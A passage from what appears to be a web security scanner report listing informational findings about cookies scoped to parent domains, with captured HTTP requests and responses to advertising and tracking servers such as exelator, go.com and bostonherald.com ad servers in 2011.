Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 16-Sep-2013 01:10:21 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 17 Sep 2011 02:10:21 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.73. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=204&g=071&j=0&buid=55785307-A5DC-4E3A-B452-DDBD426D3A1D HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27330&s=27331&a=23101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; EVX=eJxFybENwCAMBMBdPIHfiWT0HuZFSU2J2J1Q5drrBNek06w6g2vQaxKNhkQqFf7KEwrBahD%252Ftm9xt7meu3sfKQYUNg%253D%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 01:13:58 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 01:13:58 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDK0qi62MrBSUrJOBLEzrQysi60MLayUDM2NDOLN440MTOINzA3jTeMNlaxrawFAggzg; expires=Sun, 15-Jan-2012 01:13:59 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 01:13:59 GMT
Server: HTTP server


11.74. http://log.go.com/log  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://log.go.com
Path:   /log

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /log?ft=j&srvc=abc&addata=2214:65390:815034:65390&tqq=$D$&method=GET&cap=1:815034:3:24&svr=3ps.go.com&host=3ps.go.com&guid=C0945A09-F31E-4772-97EC-0345A14C8BF0&sf= HTTP/1.1
Host: log.go.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Rectangles-Remnant&url=/shows/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%253Aeve-french%7C1316240974600%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: SEEN2=um8Mie4Oum8Mie4Oum8Mie4O:; path=/; expires=Sat, 01 Oct 2011 00:58:09 GMT; domain=.go.com
Set-Cookie: TSC=1; path=/; domain=.go.com
P3P: CP="ALL ADM DEV PSAi COM NAV OUR OTR STP IND DEM"


11.75. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O10226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:07 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O20226Kk; expires=Tue, 17-Sep-13 01:01:07 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3116
Content-Type: application/x-javascript

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

11.76. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:03 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:01:03 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1540
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=300x250;click0=http://oascentral.bostonherald.com/
...[SNIP]...

11.77. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:02 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J78|O2021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:01:02 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1541
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.c
...[SNIP]...

11.78. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:03 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:01:03 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1518
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/R
...[SNIP]...

11.79. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO10226Kk; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3090
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

11.80. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGH; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1223
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<script language="JavaScript" type="text/javascript">\n');
document.write ('document.write(');
document.write ("'");
document.write ('<script language="JavaScript" src="http://ad.doub
...[SNIP]...

11.81. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO101yed8|O1021J7A; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1506
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.c
...[SNIP]...

11.82. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1462
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/R
...[SNIP]...

11.83. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO101yed8|O1021J7A; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 500
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<!-- begin ZEDO for channel: Herald Interactive - ROS , publisher: Herald Interactive , Ad Dimension: Pixel/Popup - 1 x 1 -->\n');
document.write ('<iframe src="http://d3.zedo.com/jsc
...[SNIP]...

11.84. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:00:30 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3114
Content-Type: application/x-javascript

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

11.85. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:30 GMT
Server: Apache/2.2.3 (Red Hat)
